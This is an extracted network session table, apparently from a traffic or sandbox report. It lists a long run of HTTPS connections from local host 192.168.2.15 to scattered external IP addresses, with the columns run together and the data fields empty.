                                            18735192.168.2.1537332162.177.202.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18736192.168.2.15485462.168.202.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18737192.168.2.1558944104.81.63.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18738192.168.2.1557910216.45.108.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18739192.168.2.1545308157.152.112.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18740192.168.2.155420424.89.95.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18741192.168.2.1537680177.23.103.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18742192.168.2.1554280160.108.213.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18743192.168.2.153277286.223.55.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18744192.168.2.1559398125.95.110.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18745192.168.2.1549632163.99.235.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18746192.168.2.1537406208.33.148.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18747192.168.2.1552320203.219.71.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18748192.168.2.155024612.11.69.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18749192.168.2.1546220157.203.44.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18750192.168.2.154952051.0.38.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18751192.168.2.1554296142.221.228.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18752192.168.2.1557408122.198.18.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18753192.168.2.1543738156.146.251.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18754192.168.2.1534336176.47.12.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18755192.168.2.1545146172.129.97.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18756192.168.2.154877699.137.207.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18757192.168.2.155939681.21.56.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18758192.168.2.154466497.34.246.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18759192.168.2.1545918167.156.99.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18760192.168.2.1543756107.39.201.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18761192.168.2.1545860161.29.26.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18762192.168.2.1539278153.243.79.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18763192.168.2.154153699.173.114.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18764192.168.2.1534036133.136.117.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18765192.168.2.153947045.160.183.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18766192.168.2.1549238211.66.175.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18767192.168.2.154774285.126.145.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18768192.168.2.1544468106.28.88.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18769192.168.2.15460388.73.139.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18770192.168.2.1540398205.221.136.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18771192.168.2.1551898138.27.254.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18772192.168.2.1548688152.87.243.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18773192.168.2.1543370141.165.165.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18774192.168.2.1555428139.124.9.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18775192.168.2.1547544187.162.214.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18776192.168.2.1540440222.86.226.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18777192.168.2.155075895.82.219.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18778192.168.2.154232690.187.169.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18779192.168.2.154423644.91.135.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18780192.168.2.1556784213.213.45.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18781192.168.2.1542938139.133.185.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18782192.168.2.153378259.247.94.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18783192.168.2.1545522189.126.4.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18784192.168.2.1551070120.54.10.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18785192.168.2.15489765.107.203.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18786192.168.2.154065023.254.106.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18787192.168.2.154892087.14.214.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18788192.168.2.1554154223.158.86.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18789192.168.2.1543508204.136.38.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18790192.168.2.155273267.197.165.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18791192.168.2.1533168150.44.50.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18792192.168.2.1548942164.80.144.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18793192.168.2.1559876171.186.163.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18794192.168.2.1534474157.40.59.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18795192.168.2.154814067.98.157.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18796192.168.2.155086499.122.226.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18797192.168.2.154238493.205.28.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18798192.168.2.1556988105.159.102.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18799192.168.2.1557300211.93.72.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18800192.168.2.155423842.90.228.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18801192.168.2.1535976102.248.39.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18802192.168.2.1554498186.78.59.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18803192.168.2.1556192104.0.179.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18804192.168.2.1538376118.57.255.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18805192.168.2.1549904187.187.243.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18806192.168.2.1538990109.220.115.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18807192.168.2.153779067.255.80.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18808192.168.2.153844650.12.244.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18809192.168.2.153280038.193.5.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18810192.168.2.1551926119.156.77.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18811192.168.2.1555874149.81.173.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18812192.168.2.1557614192.163.31.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18813192.168.2.153305058.244.75.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18814192.168.2.155338840.16.70.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18815192.168.2.153416844.110.153.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18816192.168.2.154526623.69.134.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18817192.168.2.154716412.80.183.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18818192.168.2.1552528130.145.77.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18819192.168.2.154279618.211.45.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18820192.168.2.1559768201.116.155.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18821192.168.2.1550760111.161.83.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18822192.168.2.1545730130.10.107.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18823192.168.2.1535812141.245.74.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18824192.168.2.155805482.116.77.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18825192.168.2.154439017.161.125.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18826192.168.2.1552488190.232.187.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18827192.168.2.153710667.95.221.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18828192.168.2.1544728158.59.169.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18829192.168.2.1555360185.8.80.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18830192.168.2.153330096.251.28.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18831192.168.2.1537006183.9.210.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18832192.168.2.155497443.13.252.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18833192.168.2.1535384223.200.204.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18834192.168.2.153468676.203.124.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18835192.168.2.1560666120.60.85.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18836192.168.2.1544136130.51.51.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18837192.168.2.1560416123.222.47.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18838192.168.2.1555494148.33.125.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18839192.168.2.1539592188.246.164.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18840192.168.2.1555242104.52.200.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18841192.168.2.153648437.164.204.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18842192.168.2.155082292.41.177.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18843192.168.2.1553766169.228.113.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18844192.168.2.154086854.45.88.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18845192.168.2.1537372156.162.108.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18846192.168.2.1539930112.94.42.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18847192.168.2.155091239.102.164.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18848192.168.2.153618244.54.234.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18849192.168.2.153360281.153.50.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18850192.168.2.154603219.95.33.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18851192.168.2.1560162169.252.203.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18852192.168.2.154862442.80.211.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18853192.168.2.153342825.153.143.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18854192.168.2.154689819.95.151.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18855192.168.2.155028292.45.203.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18856192.168.2.1556348193.130.231.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18857192.168.2.1548368154.240.227.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18858192.168.2.1534668113.13.65.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18859192.168.2.1547244175.22.43.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18860192.168.2.155970867.125.125.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18861192.168.2.1546336170.111.116.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18862192.168.2.154587212.211.16.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18863192.168.2.1536660212.63.188.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18864192.168.2.155112639.251.214.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18865192.168.2.1539640130.123.164.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18866192.168.2.1543192129.65.235.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18867192.168.2.1560702106.96.26.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18868192.168.2.1551856105.224.45.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18869192.168.2.1540274146.239.11.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18870192.168.2.1546354111.108.221.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18871192.168.2.154378099.137.226.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18872192.168.2.15426502.122.130.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18873192.168.2.1535378133.161.241.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18874192.168.2.1553882207.105.138.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18875192.168.2.1558532147.188.127.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18876192.168.2.153901449.11.71.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18877192.168.2.1535598219.239.47.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18878192.168.2.154255287.58.251.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18879192.168.2.1533760223.97.254.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18880192.168.2.1551792167.86.217.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18881192.168.2.1550130110.88.142.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18882192.168.2.1538358211.147.3.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18883192.168.2.153751825.188.234.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18884192.168.2.1550470120.109.101.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18885192.168.2.153749612.42.227.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18886192.168.2.153853450.37.145.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18887192.168.2.1539782203.135.19.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18888192.168.2.1539984172.87.152.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18889192.168.2.1547600176.125.50.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18890192.168.2.153300462.50.180.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18891192.168.2.1551932139.198.247.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18892192.168.2.1538290110.216.38.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18893192.168.2.1537760119.216.129.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18894192.168.2.1537450217.138.143.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18895192.168.2.1551220119.186.108.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18896192.168.2.1541454107.96.56.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18897192.168.2.1550116159.113.156.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18898192.168.2.1536030109.107.203.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18899192.168.2.1544720136.203.39.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18900192.168.2.1538956208.135.175.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18901192.168.2.1537444162.80.119.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18902192.168.2.154941263.170.219.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18903192.168.2.1533382104.221.99.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18904192.168.2.1534010123.252.98.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18905192.168.2.1557160223.234.187.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18906192.168.2.155767253.78.9.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18907192.168.2.155165046.205.194.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18908192.168.2.153464477.48.37.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18909192.168.2.1550404114.173.209.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18910192.168.2.1541544103.118.11.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18911192.168.2.155721276.162.149.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18912192.168.2.1548840104.55.253.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18913192.168.2.1543922219.95.243.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18914192.168.2.1550294145.197.224.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18915192.168.2.1535064165.107.181.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18916192.168.2.1547532135.160.60.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18917192.168.2.1545168174.145.56.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18918192.168.2.153485412.236.235.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18919192.168.2.1541882175.86.72.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18920192.168.2.1550034111.149.53.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18921192.168.2.1535268185.117.174.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18922192.168.2.1555230149.173.144.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18923192.168.2.1553554104.21.89.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18924192.168.2.15391081.64.25.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18925192.168.2.1536390169.194.91.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18926192.168.2.153906245.207.100.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18927192.168.2.1557052115.123.160.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18928192.168.2.1555336116.1.90.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18929192.168.2.155771017.154.24.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18930192.168.2.155394658.232.86.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18931192.168.2.1541150130.238.235.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18932192.168.2.1537954164.157.240.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18933192.168.2.1552330211.251.22.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18934192.168.2.155931061.141.190.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18935192.168.2.1534152130.170.215.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18936192.168.2.1538262152.59.200.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18937192.168.2.1553536182.28.14.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18938192.168.2.155072673.23.73.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18939192.168.2.1535326132.202.149.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18940192.168.2.154121298.247.20.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18941192.168.2.1554590149.203.196.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18942192.168.2.1538644134.209.157.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18943192.168.2.1544444159.98.95.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18944192.168.2.1542902193.190.139.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18945192.168.2.154696247.237.49.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18946192.168.2.154149863.143.78.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18947192.168.2.1552152162.158.215.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18948192.168.2.1539926179.36.44.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18949192.168.2.155974296.211.237.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18950192.168.2.155480894.67.166.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18951192.168.2.1549286219.123.154.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18952192.168.2.1552668196.161.56.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18953192.168.2.1555318119.123.118.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18954192.168.2.155677423.71.179.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18955192.168.2.155768862.216.168.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18956192.168.2.1557520170.5.114.167443
                                            TimestampBytes transferredDirectionData


